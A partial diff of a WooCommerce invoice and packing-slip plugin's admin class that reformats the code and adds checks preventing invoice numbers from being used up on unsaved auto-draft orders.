+	/**
 	 * Function to add action buttons in order email
 	 *
-	 * 	@since    2.5.0
-	 *	@since 	  2.6.5 	[Bug fix] Print button missing in email
+	 *  @since    2.5.0
+	 *  @since    2.6.5     [Bug fix] Print button missing in email
 	 */
-	public function add_email_print_actions($order)
-	{
-		if(is_object($order) && is_a($order,'WC_Order'))
-		{
-			$order=( version_compare( WC()->version, '2.7.0', '<' ) ) ? new WC_Order($order) : new wf_order($order);
-			$order_id = version_compare( WC()->version, '2.7.0', '<' ) ? $order->id : $order->get_id();
-			$html='';
-			$html=apply_filters('wt_email_print_actions',$html,$order,$order_id);
+	public function add_email_print_actions( $order ) {
+		if ( is_object( $order ) && is_a( $order, 'WC_Order' ) ) {
+			$order_id = $order->get_id();
+			$html     = '';
+			$html     = apply_filters( 'wt_email_print_actions', $html, $order, $order_id );
 		}
 	}

-    /**
+	/**
 	 * Function to add action buttons in user dashboard order list page
 	 *
 	 * @since    2.5.0
 	 */
-	public function add_fontend_print_actions($order)
-	{
-		$order=( version_compare( WC()->version, '2.7.0', '<' ) ) ? new WC_Order($order) : new wf_order($order);
-		$order_id = version_compare( WC()->version, '2.7.0', '<' ) ? $order->id : $order->get_id();
-		$html='';
-		$html=apply_filters('wt_frontend_print_actions',$html,$order,$order_id);
-	}
-
-	public function add_order_list_page_print_actions($actions, $order)
-	{
-		$order=( version_compare( WC()->version, '2.7.0', '<' ) ) ? new WC_Order($order) : new wf_order($order);
-		$order_id = version_compare( WC()->version, '2.7.0', '<' ) ? $order->id : $order->get_id();
-
-		$wt_actions=array();
-		$wt_actions=apply_filters('wt_pklist_intl_frontend_order_list_page_print_actions', $wt_actions, $order, $order_id);
-		if(is_array($wt_actions) && count($wt_actions)>0)
-		{
-			foreach($wt_actions as $template_type => $action_arr)
-			{
-				if(is_array($action_arr))
-				{
-					foreach ($action_arr as $action => $title)
-					{
-						$show_button=true;
-						$show_button=apply_filters('wt_pklist_is_frontend_order_list_page_print_action', $show_button, $template_type, $action);
-						if($show_button)
-						{
+	public function add_fontend_print_actions( $order ) {
+		if ( ! is_object( $order ) || ! is_a( $order, 'WC_Order' ) ) {
+			return;
+		}
+		$order_id = $order->get_id();
+		$html     = '';
+		$html     = apply_filters( 'wt_frontend_print_actions', $html, $order, $order_id );
+	}
+
+	public function add_order_list_page_print_actions( $actions, $order ) {
+		if ( ! is_object( $order ) || ! is_a( $order, 'WC_Order' ) ) {
+			return $actions;
+		}
+		$order_id = $order->get_id();
+
+		$wt_actions = array();
+		$wt_actions = apply_filters( 'wt_pklist_intl_frontend_order_list_page_print_actions', $wt_actions, $order, $order_id );
+		if ( is_array( $wt_actions ) && count( $wt_actions ) > 0 ) {
+			foreach ( $wt_actions as $template_type => $action_arr ) {
+				if ( is_array( $action_arr ) ) {
+					foreach ( $action_arr as $action => $title ) {
+						$show_button = true;
+						$show_button = apply_filters( 'wt_pklist_is_frontend_order_list_page_print_action', $show_button, $template_type, $action );
+						if ( $show_button ) {
 							/** button info to WC hook */
-							$action_data=array(
-								'url'  => Wf_Woocommerce_Packing_List::generate_print_url_for_user($order, $order_id, $template_type, $action),
+							$action_data = array(
+								'url'  => Wf_Woocommerce_Packing_List::generate_print_url_for_user( $order, $order_id, $template_type, $action ),
 								'name' => $title,
 							);
-							$actions['wt_pklist_'.$template_type.'_'.$action]=apply_filters('wt_pklist_frontend_order_list_page_print_action', $action_data, $template_type, $action, $order, $order_id);
+							$actions[ 'wt_pklist_' . $template_type . '_' . $action ] = apply_filters( 'wt_pklist_frontend_order_list_page_print_action', $action_data, $template_type, $action, $order, $order_id );
 						}
 					}
 				}
@@ -492,74 +476,104 @@
 		return $actions;
 	}

-	public static function get_print_url($order_id, $action)
-	{
-		$url=wp_nonce_url(admin_url('?print_packinglist=true&post='.($order_id).'&type='.$action), WF_PKLIST_PLUGIN_NAME);
-		$nonce = isset($_GET['_wpnonce']) ? sanitize_text_field(wp_unslash($_GET['_wpnonce'])) : ''; // phpcs:ignore WordPress.Security.NonceVerification.Recommended,WordPress.Security.ValidatedSanitizedInput.MissingUnslash,WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
-		$url=(isset($_GET['debug']) && wp_verify_nonce($nonce, 'debug_mode')) ? $url.'&debug' : $url;
+	/**
+	 * Whether the order has never been saved (still an auto-draft from "Add new order").
+	 * Used to block invoice number generation on orders the admin may abandon.
+	 *
+	 * @param WC_Order|object $order
+	 * @return bool
+	 */
+	public static function is_order_unsaved( $order ) {
+		if ( ! is_object( $order ) || ! method_exists( $order, 'get_status' ) ) {
+			return false;
+		}
+		return 'auto-draft' === $order->get_status();
+	}
+
+	/**
+	 * Whether the given print/download action allocates a sequence number on
+	 * generation. Only invoice and proforma-invoice flows do — those are the
+	 * ones that must be blocked on auto-draft orders.
+	 *
+	 * @param string $action Action key from $_GET['type'] (e.g. 'print_invoice').
+	 * @return bool
+	 */
+	public static function action_burns_invoice_number( $action ) {
+		$invoice_actions = array(
+			'print_invoice',
+			'download_invoice',
+			'print_proformainvoice',
+			'download_proformainvoice',
+			'print_dispatchlabel',
+			'download_dispatchlabel',
+		);
+		return in_array( $action, $invoice_actions, true );
+	}
+
+	public static function get_print_url( $order_id, $action ) {
+		$url   = wp_nonce_url( admin_url( '?print_packinglist=true&post=' . ( $order_id ) . '&type=' . $action ), WF_PKLIST_PLUGIN_NAME );
+		$nonce = isset( $_GET['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_GET['_wpnonce'] ) ) : ''; // phpcs:ignore WordPress.Security.NonceVerification.Recommended,WordPress.Security.ValidatedSanitizedInput.MissingUnslash,WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
+		$url   = ( isset( $_GET['debug'] ) && wp_verify_nonce( $nonce, 'debug_mode' ) ) ? $url . '&debug' : $url;
 		return $url;
 	}

-	public static function generate_print_button_data($order,$order_id,$action,$label,$icon_url,$is_show_prompt,$button_location="detail_page")
-	{
-		$url=self::get_print_url($order_id, $action);
-
-		$href_attr='';
-		$onclick='';
-		$confirmation_clss='';
-		if(false === Wf_Woocommerce_Packing_List::is_from_address_available())
-    	{
-    		$is_show_prompt = 3;
-    	}
-		if((1 === $is_show_prompt || "1" === $is_show_prompt) || (2 === $is_show_prompt || "2" === $is_show_prompt) || (3 === $is_show_prompt || "3" === $is_show_prompt))
-		{
-			$confirmation_clss='wf_pklist_confirm_'.$action;
-			$onclick='onclick=" return wf_Confirm_Notice_for_Manually_Creating_Invoicenumbers(''.$url.'','.$is_show_prompt.');"';
-		}else
-		{
-			$href_attr=' href="'.esc_url($url).'"';
-		}
-		if("detail_page" === $button_location)
-        {
-        ?>
+	public static function generate_print_button_data( $order, $order_id, $action, $label, $icon_url, $is_show_prompt, $button_location = 'detail_page' ) {
+		$url = self::get_print_url( $order_id, $action );
+
+		$href_attr         = '';
+		$onclick           = '';
+		$confirmation_clss = '';
+		// Only invoice / proforma invoice burn a number on auto-draft orders.
+		// Dispatch label / packing slip / etc. also pass is_show_prompt = 1 in
+		// their own context, so gate by action name instead.
+		if ( self::is_order_unsaved( $order ) && self::action_burns_invoice_number( $action ) ) {
+			$is_show_prompt = 99;
+		} elseif ( false === Wf_Woocommerce_Packing_List::is_from_address_available() ) {
+			$is_show_prompt = 3;
+		}
+		if ( ( 1 === $is_show_prompt || '1' === $is_show_prompt ) || ( 2 === $is_show_prompt || '2' === $is_show_prompt ) || ( 3 === $is_show_prompt || '3' === $is_show_prompt ) || ( 99 === $is_show_prompt || '99' === $is_show_prompt ) ) {
+			$confirmation_clss = 'wf_pklist_confirm_' . $action;
+			$onclick           = 'onclick=" return wf_Confirm_Notice_for_Manually_Creating_Invoicenumbers('' . $url . '',' . $is_show_prompt . ');"';
+		} else {
+			$href_attr = ' href="' . esc_url( $url ) . '"';
+		}
+		if ( 'detail_page' === $button_location ) {
+			?>
 		<tr>
 			<td>
-				<a class="button tips wf-packing-list-link" <?php echo wp_kses_post($onclick);?> <?php echo wp_kses_post($href_attr);?> target="_blank" data-tip="<?php echo esc_attr(wp_strip_all_tags($label));?>" >
-				<?php
-				if("" !== $icon_url)
-				{
-				?>
-					<img src="<?php echo esc_url($icon_url);?>" alt="<?php echo esc_attr($label);?>" width="14">
+				<a class="button tips wf-packing-list-link" <?php echo wp_kses_post( $onclick ); ?> <?php echo wp_kses_post( $href_attr ); ?> target="_blank" data-tip="<?php echo esc_attr( wp_strip_all_tags( $label ) ); ?>" >
 				<?php
+				if ( '' !== $icon_url ) {
+					?>
+					<img src="<?php echo esc_url( $icon_url ); ?>" alt="<?php echo esc_attr( $label ); ?>" width="14">
+					<?php
 				}
 				?>
-				<?php echo wp_kses_post($label);?>
+				<?php echo wp_kses_post( $label ); ?>
 				</a>
 			</td>
 		</tr>
-		<?php
-        }elseif("list_page" === $button_location)
-        {
-        ?>
+			<?php
+		} elseif ( 'list_page' === $button_location ) {
+			?>
 			<li>
-				<a class="<?php echo esc_attr($confirmation_clss);?>" data-id="<?php echo esc_attr($order_id);?>" <?php echo wp_kses_post($onclick);?> <?php echo wp_kses_post($href_attr);?> target="_blank"><?php echo wp_kses_post($label);?></a>
+				<a class="<?php echo esc_attr( $confirmation_clss ); ?>" data-id="<?php echo esc_attr( $order_id ); ?>" <?php echo wp_kses_post( $onclick ); ?> <?php echo wp_kses_post( $href_attr ); ?> target="_blank"><?php echo wp_kses_post( $label ); ?></a>
 			</li>
-		<?php
-        }
+			<?php
+		}
 	}
-
+
 	/**
 	 * Registers meta box and printing options
 	 *
 	 * @since 2.5.0
 	 * @since 4.1.3 - Add - Debug meta box in order edit page - admin dashboard
 	 */
-	public function add_meta_boxes()
-	{
+	public function add_meta_boxes() {
 		$order_details_screen = Wt_Pklist_Common::is_wc_hpos_enabled() ? wc_get_page_screen_id( 'shop-order' ) : 'shop_order';
-		add_meta_box('woocommerce-packinglist-box', __('Invoice/Packing','print-invoices-packing-slip-labels-for-woocommerce'), array($this,'create_metabox_content'),$order_details_screen, 'side', 'default');
-		if(isset($_GET['wt-pklist-debug'])){ // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- This is a safe use of isset.
-			add_meta_box('woocommerce-packinglist-box-debug', __('WT PDF Invoice Debug','print-invoices-packing-slip-labels-for-woocommerce'), array($this,'wt_pklist_debug_metabox_content'),$order_details_screen, 'normal', 'default');
+		add_meta_box( 'woocommerce-packinglist-box', __( 'Invoice/Packing', 'print-invoices-packing-slip-labels-for-woocommerce' ), array( $this, 'create_metabox_content' ), $order_details_screen, 'side', 'default' );
+		if ( isset( $_GET['wt-pklist-debug'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- This is a safe use of isset.
+			add_meta_box( 'woocommerce-packinglist-box-debug', __( 'WT PDF Invoice Debug', 'print-invoices-packing-slip-labels-for-woocommerce' ), array( $this, 'wt_pklist_debug_metabox_content' ), $order_details_screen, 'normal', 'default' );
 		}
 	}

@@ -568,297 +582,271 @@
 	 *
 	 * @param array $links links array
 	 */
-	public function plugin_action_links($links)
-	{
-	   	$links[] = '<a href="'.admin_url('admin.php?page='.WF_PKLIST_POST_TYPE).'">'.__('Settings', 'print-invoices-packing-slip-labels-for-woocommerce').'</a>';
-	   	$links[] = '<a href="https://wordpress.org/support/plugin/print-invoices-packing-slip-labels-for-woocommerce/#new-topic-0" target="_blank">'.__('Support','print-invoices-packing-slip-labels-for-woocommerce').'</a>';
-	   	$links[] = '<a href="https://wordpress.org/support/plugin/print-invoices-packing-slip-labels-for-woocommerce/reviews/?rate=5#new-post" target="_blank">' . __('Review','print-invoices-packing-slip-labels-for-woocommerce') . '</a>';
-	   	$links[] = '<a href="https://www.webtoffee.com/woocommerce-pdf-invoices-packing-slips-delivery-notes-shipping-labels-userguide-free-version/" target="_blank">' . __('Documentation','print-invoices-packing-slip-labels-for-woocommerce') . '</a>';
-	   	$not_activated_pro_addons = Wf_Woocommerce_Packing_List_Admin::not_activated_pro_addons('wt_qr_addon');
-	   	if(!empty($not_activated_pro_addons)){
-	   		$pro_addon_arr = array(
-		   		'wt_ipc_addon' => array(
-		   				'utm_link' => 'https://www.webtoffee.com/product/woocommerce-pdf-invoices-packing-slips/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=PDF_invoice&utm_content='.WF_PKLIST_VERSION,
-		   				'link_label' => __('PDF Invoices','print-invoices-packing-slip-labels-for-woocommerce'),
-		   			),
-		   		'wt_sdd_addon' => array(
-		   				'utm_link' => 'https://www.webtoffee.com/product/woocommerce-shipping-labels-delivery-notes/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=Shipping_Label&utm_content='.WF_PKLIST_VERSION,
-		   				'link_label' => __('Shipping labels','print-invoices-packing-slip-labels-for-woocommerce'),
-		   			),
-		   		'wt_pl_addon' => array(
-		   				'utm_link' => 'https://www.webtoffee.com/product/woocommerce-picklist/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=Picklist&utm_content='.WF_PKLIST_VERSION,
-		   				'link_label' => __('Pick lists','print-invoices-packing-slip-labels-for-woocommerce'),
-		   			),
-		   		'wt_pi_addon' => array(
-		   				'utm_link' => 'https://www.webtoffee.com/product/woocommerce-proforma-invoice/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=Proforma_Invoice&utm_content='.WF_PKLIST_VERSION,
-		   				'link_label' => __('Proforma invoices','print-invoices-packing-slip-labels-for-woocommerce'),
-		   			),
-		   		'wt_al_addon' => array(
-		   				'utm_link' => 'https://www.webtoffee.com/product/woocommerce-address-label/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=Address_Label&utm_content='.WF_PKLIST_VERSION,
-		   				'link_label' => __('Address labels','print-invoices-packing-slip-labels-for-woocommerce'),
-		   			),
-		   	);
-	   		$addon_link = '<br><span style="color:#3db634;">'.__("Premium Extensions","print-invoices-packing-slip-labels-for-woocommerce").': </span>';
-		   	for($i = 0; $i < count($not_activated_pro_addons); $i++){
-		   		if(isset($pro_addon_arr[$not_activated_pro_addons[$i]])){
-		   			$pro_add = $pro_addon_arr[$not_activated_pro_addons[$i]];
-		   			$addon_link .= '<a href="'.esc_url($pro_add['utm_link']).'" target="_blank">'.esc_html($pro_add['link_label']).'</a>';
-		   			if($i < count($not_activated_pro_addons)-1){
-		   				$addon_link .=' | ';
-		   			}
-		   		}
-		   	}
-	   		$links[] = $addon_link;
-	   	}
-	   	return $links;
+	public function plugin_action_links( $links ) {
+		$links[]                  = '<a href="' . admin_url( 'admin.php?page=' . WF_PKLIST_POST_TYPE ) . '">' . __( 'Settings', 'print-invoices-packing-slip-labels-for-woocommerce' ) . '</a>';
+		$links[]                  = '<a href="https://wordpress.org/support/plugin/print-invoices-packing-slip-labels-for-woocommerce/#new-topic-0" target="_blank">' . __( 'Support', 'print-invoices-packing-slip-labels-for-woocommerce' ) . '</a>';
+		$links[]                  = '<a href="https://wordpress.org/support/plugin/print-invoices-packing-slip-labels-for-woocommerce/reviews/?rate=5#new-post" target="_blank">' . __( 'Review', 'print-invoices-packing-slip-labels-for-woocommerce' ) . '</a>';
+		$links[]                  = '<a href="https://www.webtoffee.com/woocommerce-pdf-invoices-packing-slips-delivery-notes-shipping-labels-userguide-free-version/" target="_blank">' . __( 'Documentation', 'print-invoices-packing-slip-labels-for-woocommerce' ) . '</a>';
+		$not_activated_pro_addons = self::not_activated_pro_addons( 'wt_qr_addon' );
+		if ( ! empty( $not_activated_pro_addons ) ) {
+			$pro_addon_arr = array(
+				'wt_ipc_addon' => array(
+					'utm_link'   => 'https://www.webtoffee.com/product/woocommerce-pdf-invoices-packing-slips/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=PDF_invoice&utm_content=' . WF_PKLIST_VERSION,
+					'link_label' => __( 'PDF Invoices', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				),
+				'wt_sdd_addon' => array(
+					'utm_link'   => 'https://www.webtoffee.com/product/woocommerce-shipping-labels-delivery-notes/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=Shipping_Label&utm_content=' . WF_PKLIST_VERSION,
+					'link_label' => __( 'Shipping labels', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				),
+				'wt_pl_addon'  => array(
+					'utm_link'   => 'https://www.webtoffee.com/product/woocommerce-picklist/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=Picklist&utm_content=' . WF_PKLIST_VERSION,
+					'link_label' => __( 'Pick lists', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				),
+				'wt_pi_addon'  => array(
+					'utm_link'   => 'https://www.webtoffee.com/product/woocommerce-proforma-invoice/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=Proforma_Invoice&utm_content=' . WF_PKLIST_VERSION,
+					'link_label' => __( 'Proforma invoices', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				),
+				'wt_al_addon'  => array(
+					'utm_link'   => 'https://www.webtoffee.com/product/woocommerce-address-label/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=Address_Label&utm_content=' . WF_PKLIST_VERSION,
+					'link_label' => __( 'Address labels', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				),
+			);
+			$addon_link    = '<br><span style="color:#3db634;">' . __( 'Premium Extensions', 'print-invoices-packing-slip-labels-for-woocommerce' ) . ': </span>';
+			for ( $i = 0; $i < count( $not_activated_pro_addons ); $i++ ) {
+				if ( isset( $pro_addon_arr[ $not_activated_pro_addons[ $i ] ] ) ) {
+					$pro_add     = $pro_addon_arr[ $not_activated_pro_addons[ $i ] ];
+					$addon_link .= '<a href="' . esc_url( $pro_add['utm_link'] ) . '" target="_blank">' . esc_html( $pro_add['link_label'] ) . '</a>';
+					if ( $i < count( $not_activated_pro_addons ) - 1 ) {
+						$addon_link .= ' | ';
+					}
+				}
+			}
+			$links[] = $addon_link;
+		}
+		return $links;
 	}

 	/**
-	 *	@since  4.0.0
-	 * 	- create content for metabox
-	 *	- added separate section for document details and print actions
-	 *
+	 *  @since  4.0.0
+	 *  - create content for metabox
+	 *  - added separate section for document details and print actions
 	 */
-	public function create_metabox_content($post_or_order_object)
-	{
+	public function create_metabox_content( $post_or_order_object ) {
 		$order = ( $post_or_order_object instanceof WP_Post ) ? wc_get_order( $post_or_order_object->ID ) : $post_or_order_object;
 		if ( ! is_object( $order ) && is_numeric( $order ) ) {
 			$order = wc_get_order( absint( $order ) );
 		}
-		$order_id = version_compare( WC()->version, '2.7.0', '<' ) ? $order->id : $order->get_id();
+		$order_id = $order->get_id();
 		?>
-		<table class="wf_invoice_metabox" style="width:100%;">
+		<table class="wf_invoice_metabox" style="width:100%;">
 			<?php
-			$data_arr=array();
-			$data_arr=apply_filters('wt_print_docdata_metabox',$data_arr, $order, $order_id);
-			if(count($data_arr)>0)
-			{
-			?>
+			$data_arr = array();
+			$data_arr = apply_filters( 'wt_print_docdata_metabox', $data_arr, $order, $order_id );
+			if ( count( $data_arr ) > 0 ) {
+				?>
 			<tr>
 				<td style="font-weight:bold;">
-					<h4 style="margin:0px; padding-top:5px; padding-bottom:3px; border-bottom:dashed 1px #ccc;"><?php esc_html_e('Document details','print-invoices-packing-slip-labels-for-woocommerce'); ?></h4>
+					<h4 style="margin:0px; padding-top:5px; padding-bottom:3px; border-bottom:dashed 1px #ccc;"><?php esc_html_e( 'Document details', 'print-invoices-packing-slip-labels-for-woocommerce' ); ?></h4>
 				</td>
 			</tr>
 			<tr>
 				<td style="padding-bottom:10px;">
 					<?php
-
-					foreach($data_arr as $datav)
-					{
+
+					foreach ( $data_arr as $datav ) {
 						echo '<span style="font-weight:500;">';
-						echo ("" !== $datav['label'] ? esc_html($datav['label']).': ' : '');
+						echo ( '' !== $datav['label'] ? esc_html( $datav['label'] ) . ': ' : '' );
 						echo '</span>';
-						echo esc_html($datav['value']).'<br />';
+						echo esc_html( $datav['value'] ) . '<br />';
 					}
 					?>
 				</td>
 			</tr>
-			<?php
+				<?php
 			}
 			?>
 			<tr>
 				<td>
-					<h4 style="margin:0px; padding-top:5px; padding-bottom:3px; border-bottom:dashed 1px #ccc;"><?php esc_html_e('Print/Download','print-invoices-packing-slip-labels-for-woocommerce'); ?></h4>
+					<h4 style="margin:0px; padding-top:5px; padding-bottom:3px; border-bottom:dashed 1px #ccc;"><?php esc_html_e( 'Print/Download', 'print-invoices-packing-slip-labels-for-woocommerce' ); ?></h4>
 				</td>
 			</tr>
 			<tr>
 				<td style="height:3px; font-size:0px; line-height:0px;"></td>
 			</tr>
 			<?php
-			$btn_arr=array();
-			$btn_arr=apply_filters('wt_print_actions', $btn_arr, $order, $order_id, 'detail_page');
-			self::generate_print_button_html($btn_arr, $order, $order_id, 'detail_page'); //generate buttons
+			$btn_arr = array();
+			$btn_arr = apply_filters( 'wt_print_actions', $btn_arr, $order, $order_id, 'detail_page' );
+			self::generate_print_button_html( $btn_arr, $order, $order_id, 'detail_page' ); // generate buttons
 			?>
 		</table>
 		<?php
 	}

-	public static function generate_print_button_html($btn_arr, $order, $order_id, $button_location)
-	{
+	public static function generate_print_button_html( $btn_arr, $order, $order_id, $button_location ) {
 		/* filter for customers to alter buttons */
-		$btn_arr=apply_filters('wt_pklist_alter_print_actions',$btn_arr, $order, $order_id, $button_location);
-
+		$btn_arr = apply_filters( 'wt_pklist_alter_print_actions', $btn_arr, $order, $order_id, $button_location );
+
 		// Start output buffering only for list_page (which expects return value)
-		if ('list_page' === $button_location) {
+		if ( 'list_page' === $button_location ) {
 			ob_start();
 		}
-
-		foreach($btn_arr as $btn_key=>$args)
-		{
-			$action=$args['action'];
-			if("print_invoice" === $action || 'print_packinglist' === $action){
+
+		foreach ( $btn_arr as $btn_key => $args ) {
+			$action = $args['action'];
+			if ( 'print_invoice' === $action || 'print_packinglist' === $action ) {
 				continue;
 			}
-			$css_class=(isset($args['css_class']) && is_string($args['css_class']) ? $args['css_class'] : ''); /* button custom css */
-			$custom_attr=(isset($args['custom_attr']) && is_string($args['custom_attr']) ? $args['custom_attr'] : ''); /* button custom attribute */
+			$css_class   = ( isset( $args['css_class'] ) && is_string( $args['css_class'] ) ? $args['css_class'] : '' ); /* button custom css */
+			$custom_attr = ( isset( $args['custom_attr'] ) && is_string( $args['custom_attr'] ) ? $args['custom_attr'] : '' ); /* button custom attribute */

-			$label=$args['label'];
-			$is_show_prompt=$args['is_show_prompt'];
-			$tooltip=(isset($args['tooltip']) ? $args['tooltip'] : $label);
-			$button_location=(isset($args['button_location']) ? $args['button_location'] : 'detail_page');
-
-			$url=self::get_print_url($order_id, $action);
-
-			$href_attr='';
-			$onclick='';
-			$confirmation_clss='';
-			if(0 !== $is_show_prompt && "0" !== $is_show_prompt) //$is_show_prompt variable is a string then it will set as warning msg title
-			{
-				$confirmation_clss='wf_pklist_confirm_'.$action;
-				$onclick='onclick=" return wf_Confirm_Notice_for_Manually_Creating_Invoicenumbers(''.$url.'',''.$is_show_prompt.'');"';
-			}else
-			{
-				$href_attr=' href="'.$url.'"';
-			}
-			if("detail_page" === $button_location)
-	        {
-	        	$button_type=(isset($args['button_type']) ? $args['button_type'] : 'normal');
-	        	$button_key=(isset($args['button_key']) ? $args['button_key'] : 'button_key_'.$btn_key);
-				$doc_exist = (isset($args['exist']) ? $args['exist'] : false);
-				$icon_class = false === $doc_exist ? 'wt_doc_not_exist' : '';
-	        ?>
+			$label           = $args['label'];
+			$is_show_prompt  = $args['is_show_prompt'];
+			$tooltip         = ( isset( $args['tooltip'] ) ? $args['tooltip'] : $label );
+			$button_location = ( isset( $args['button_location'] ) ? $args['button_location'] : 'detail_page' );
+
+			// Only invoice / proforma actions burn a sequence number on auto-draft.
+			if ( self::is_order_unsaved( $order ) && self::action_burns_invoice_number( $action ) ) {
+				$is_show_prompt = 99;
+			}
+
+			$url = self::get_print_url( $order_id, $action );
+
+			$href_attr         = '';
+			$onclick           = '';
+			$confirmation_clss = '';
+			if ( 0 !== $is_show_prompt && '0' !== $is_show_prompt ) {
+				$confirmation_clss = 'wf_pklist_confirm_' . $action;
+				$onclick           = 'onclick=" return wf_Confirm_Notice_for_Manually_Creating_Invoicenumbers('' . $url . '','' . $is_show_prompt . '');"';
+			} else {
+				$href_attr = ' href="' . $url . '"';
+			}
+			if ( 'detail_page' === $button_location ) {
+				$button_type = ( isset( $args['button_type'] ) ? $args['button_type'] : 'normal' );
+				$button_key  = ( isset( $args['button_key'] ) ? $args['button_key'] : 'button_key_' . $btn_key );
+				$doc_exist   = ( isset( $args['exist'] ) ? $args['exist'] : false );
+				$icon_class  = false === $doc_exist ? 'wt_doc_not_exist' : '';
+				?>
 				<tr>
 					<td class="wt_pklist_dash_btn_row">
 						<?php
-						if("aggregate" === $button_type || "dropdown" === $button_type)
-						{
-							if("aggregate" === $button_type) /* reverse the order of buttons */
-							{
-								$args['items']=array_reverse($args['items']);
+						if ( 'aggregate' === $button_type || 'dropdown' === $button_type ) {
+							if ( 'aggregate' === $button_type ) {
+								$args['items'] = array_reverse( $args['items'] );
 							}
 							?>
-							<div class="wt_pklist_<?php echo esc_attr($button_type);?> <?php echo esc_attr($css_class);?>" <?php echo wp_kses_post($custom_attr);?> >
-								<div class="wt_pklist_btn_text"><?php echo wp_kses_post($label);?></div>
-								<div class="wt_pklist_<?php echo esc_attr($button_type);?>_content">
+							<div class="wt_pklist_<?php echo esc_attr( $button_type ); ?> <?php echo esc_attr( $css_class ); ?>" <?php echo wp_kses_post( $custom_attr ); ?> >
+								<div class="wt_pklist_btn_text"><?php echo wp_kses_post( $label ); ?></div>
+								<div class="wt_pklist_<?php echo esc_attr( $button_type ); ?>_content">
 									<?php
-									foreach($args['items'] as $btnkk => $btnvv)
-									{
-										$action=$btnvv['action'];
-										$label=$btnvv['label'];
-
-										$icon=(isset($btnvv['icon']) && "" !== $btnvv['icon'] ? $btnvv['icon'] : ''); //dashicon
-										$icon_url=(isset($btnvv['icon_url']) && "" !== $btnvv['icon_url'] ? $btnvv['icon_url'] : ''); //image icon
-
-										if("aggregate" === $button_type) /* only icon, No label */
-										{
-											if("" === $icon && "" === $icon_url)
-											{
+									foreach ( $args['items'] as $btnkk => $btnvv ) {
+										$action = $btnvv['action'];
+										$label  = $btnvv['label'];
+
+										$icon     = ( isset( $btnvv['icon'] ) && '' !== $btnvv['icon'] ? $btnvv['icon'] : '' ); // dashicon
+										$icon_url = ( isset( $btnvv['icon_url'] ) && '' !== $btnvv['icon_url'] ? $btnvv['icon_url'] : '' ); // image icon
+
+										if ( 'aggregate' === $button_type ) {
+											if ( '' === $icon && '' === $icon_url ) {
 												global $wp_version;
-												if(version_compare($wp_version, '5.5.3')>=0)
-												{
-													$fallback_icon='tag';
-													if(false !== strpos($action, 'download_'))
-													{
-														$fallback_icon='download';
-
-													}elseif(false !== strpos($action, 'print_'))
-													{
-														$fallback_icon='printer';
+												if ( version_compare( $wp_version, '5.5.3' ) >= 0 ) {
+													$fallback_icon = 'tag';
+													if ( false !== strpos( $action, 'download_' ) ) {
+														$fallback_icon = 'download';
+
+													} elseif ( false !== strpos( $action, 'print_' ) ) {
+														$fallback_icon = 'printer';
 													}
-													$btn_label='<span class="dashicons dashicons-'.$fallback_icon.' '.esc_attr($icon_class).'"></span>';
+													$btn_label = '<span class="dashicons dashicons-' . $fallback_icon . ' ' . esc_attr( $icon_class ) . '"></span>';

-												}else
-												{
-													$fallback_icon_url='tag-icon.png';
-													if(false !== strpos($action, 'download_'))
-													{
-														$fallback_icon_url='download-icon.png';
-
-													}elseif(false !== strpos($action, 'print_'))
-													{
-														$fallback_icon_url='print-icon.png';
+												} else {
+													$fallback_icon_url = 'tag-icon.png';
+													if ( false !== strpos( $action, 'download_' ) ) {
+														$fallback_icon_url = 'download-icon.png';
+
+													} elseif ( false !== strpos( $action, 'print_' ) ) {
+														$fallback_icon_url = 'print-icon.png';
 													}
-													$btn_label='<span class="dashicons" style="line-height:17px;"><img src="'.WF_PKLIST_PLUGIN_URL.'admin/images/'.$fallback_icon_url.'" style="width:16px; height:16px; display:inline;"></span>';
-												}
-											}else
-											{
-												if("" !== $icon)
-												{
-													$btn_label='<span class="dashicons dashicons-'.$icon.' '.esc_attr($icon_class).'"></span>';
-												}else
-												{
-													$btn_label='<span class="dashicons" style="line-height:17px;"><img src="'.esc_url($icon_url).'" style="width:16px; height:16px; display:inline;"></span>';
+													$btn_label = '<span class="dashicons" style="line-height:17px;"><img src="' . WF_PKLIST_PLUGIN_URL . 'admin/images/' . $fallback_icon_url . '" style="width:16px; height:16px; display:inline;"></span>';
 												}
+											} elseif ( '' !== $icon ) {
+													$btn_label = '<span class="dashicons dashicons-' . $icon . ' ' . esc_attr( $icon_class ) . '"></span>';
+											} else {
+												$btn_label = '<span class="dashicons" style="line-height:17px;"><img src="' . esc_url( $icon_url ) . '" style="width:16px; height:16px; display:inline;"></span>';
 											}
-											if(true === $doc_exist){
+											if ( true === $doc_exist ) {
 												$btn_label .= '<span class="dashicons dashicons-saved wt_pklist_doc_exist"></span>';
 											}
-										}else
-										{
-											$btn_label=$label;
+										} else {
+											$btn_label = $label;
 										}

-										$tooltip=(isset($btnvv['tooltip']) ? $btnvv['tooltip'] : $label);
-										$is_show_prompt=$btnvv['is_show_prompt'];
-										$item_css_class=(isset($btnvv['css_class']) && is_string($btnvv['css_class']) ? $btnvv['css_class'] : ''); /* dropdown item custom css */
-										$item_custom_attr=(isset($btnvv['custom_attr']) && is_string($btnvv['custom_attr']) ? $btnvv['custom_attr'] : ''); /* dropdown item custom attribute */
-
-										$url=self::get_print_url($order_id, $action);
-
-										$href_attr='';
-										$onclick='';
-										$confirmation_clss='';
-										$print_node_attr = '';
-										if(0 !== $is_show_prompt) //$is_show_prompt variable is a string then it will set as warning msg title
-										{
